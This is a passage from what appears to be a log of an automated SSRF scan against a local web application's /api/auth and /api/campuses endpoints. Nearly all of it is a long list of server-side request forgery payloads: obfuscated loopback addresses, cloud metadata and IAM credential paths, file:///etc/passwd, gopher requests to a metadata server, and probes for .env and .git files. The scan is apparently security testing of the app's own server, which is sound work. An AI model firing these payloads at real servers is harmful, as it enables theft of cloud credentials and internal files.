`http://localhost:4200/api/auth?url=2130706433%2F` +- Testing: `http://localhost:4200/api/auth?url=3232235521%2F` +- Testing: `http://localhost:4200/api/auth?url=3232235777%2F` +- Testing: `http://localhost:4200/api/auth?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/auth?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1` +- Testing: `http://localhost:4200/api/auth?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/auth?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/auth?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/auth?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/auth?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/auth?url=0%2F` +- Testing: `http://localhost:4200/api/auth?url=127.1` +- Testing: `http://localhost:4200/api/auth?url=127.0.1` +- Testing: `http://localhost:4200/api/auth?url=localtest.me` +- Testing: `http://localhost:4200/api/auth?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/auth?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/auth?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/auth?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/auth?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/auth?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/auth?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/auth?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/auth?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth?url=127.0.1.3` +- Testing: `http://localhost:4200/api/auth?url=0` +- Testing: `http://localhost:4200/api/auth?url=127.1` +- Testing: `http://localhost:4200/api/auth?url=127.0.1` +- Testing: `http://localhost:4200/api/auth?url=localhost` +- Testing: `http://localhost:4200/api/auth?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/auth?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/auth?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/auth?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/auth?url=7F000001` +- Testing: `http://localhost:4200/api/auth?url=2130706433` +- Testing: `http://localhost:4200/api/auth?url=6425673729` +- Testing: `http://localhost:4200/api/auth?url=127001` +- Testing: `http://localhost:4200/api/auth?url=127_0._0_1` +- Testing: `http://localhost:4200/api/auth?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/auth?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/auth?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/auth?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/auth?url=localtest.me` +- Testing: `http://localhost:4200/api/auth?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/auth?url=127.127.127.127` +- Testing: `http://localhost:4200/api/auth?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/auth?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/auth?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/auth?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/auth?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/auth?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/auth?url=0x7f000001` +- Testing: `http://localhost:4200/api/auth?url=017700000001` +- Testing: `http://localhost:4200/api/auth?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/auth?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/auth?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/auth?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/auth?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/auth?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/auth?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/auth?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/auth?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/auth?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254` +- Testing: `http://localhost:4200/api/auth?url=2852039166` +- Testing: `http://localhost:4200/api/auth?url=7147006462` +- Testing: `http://localhost:4200/api/auth?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/auth?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/auth?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/auth?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/auth?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/auth?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/auth?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/auth?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/auth?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/auth?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/auth?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/auth?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/auth?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/auth?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/auth?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/auth?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/auth?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/auth?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/auth?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/auth?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/auth?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/auth?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/auth?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/auth?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/auth?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/auth?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/auth?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/auth?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/auth?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/auth?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/auth?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/auth?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.0` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/auth?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/auth?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/auth?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/auth?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/auth?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/auth?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/auth?url=3232235521` +- Testing: `http://localhost:4200/api/auth?url=3232235777` +- Testing: `http://localhost:4200/api/auth?url=425.510.425.510` +- Testing: `http://localhost:4200/api/auth?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/auth?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/auth?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/auth?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/auth?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/auth?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/auth?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/auth?url=instance-data` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A22` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A443` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A80` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/auth?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/auth?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/auth?url=loopback` +- Testing: `http://localhost:4200/api/auth?url=loopback%3A22` +- Testing: `http://localhost:4200/api/auth?url=loopback%3A80` +- Testing: `http://localhost:4200/api/auth?url=loopback%3A443` +- Testing: `http://localhost:4200/api/auth?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/auth?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/auth?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/auth?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/auth?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/auth?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/auth?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/auth?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/auth?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/auth?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/auth?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/auth?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/auth?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/auth?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/auth?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/auth?url=127.1%3A80` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/auth?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/auth?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/auth?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/auth?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/auth?url=2130706433%2F` +- Testing: `http://localhost:4200/api/auth?url=3232235521%2F` +- Testing: `http://localhost:4200/api/auth?url=3232235777%2F` +- Testing: `http://localhost:4200/api/auth?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/auth?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/auth?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/auth?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/auth?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/auth?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/auth?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/auth?url=0%2F` +- Testing: `http://localhost:4200/api/auth?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/auth?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/campuses +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/campuses?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/campuses?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/campuses?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/campuses?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/campuses?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/campuses?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/campuses?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/campuses?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/campuses?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/campuses?url=127.1%3A80` +- Testing: `http://localhost:4200/api/campuses?url=0` +- Testing: `http://localhost:4200/api/campuses?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/campuses?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/campuses?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/campuses?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/campuses?url=127.127.127.127` +- Testing: `http://localhost:4200/api/campuses?url=127.0.1.3` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.0` +- Testing: `http://localhost:4200/api/campuses?url=2130706433` +- Testing: `http://localhost:4200/api/campuses?url=017700000001` +- Testing: `http://localhost:4200/api/campuses?url=0x7f000001` +- Testing: `http://localhost:4200/api/campuses?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/campuses?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/campuses?url=` +- Testing: `http://localhost:4200/api/campuses?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/campuses?url=` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/campuses?url=` +- Testing: `http://localhost:4200/api/campuses?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/campuses?url=` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/campuses?url=` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/campuses?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/campuses?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/campuses?url=google.com.localhost` +- Testing: `http://localhost:4200/api/campuses?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/campuses?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/campuses?url=` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/campuses?url=` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/campuses?url=` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/campuses?url=localtest.me` +- Testing: `http://localhost:4200/api/campuses?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/campuses?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: 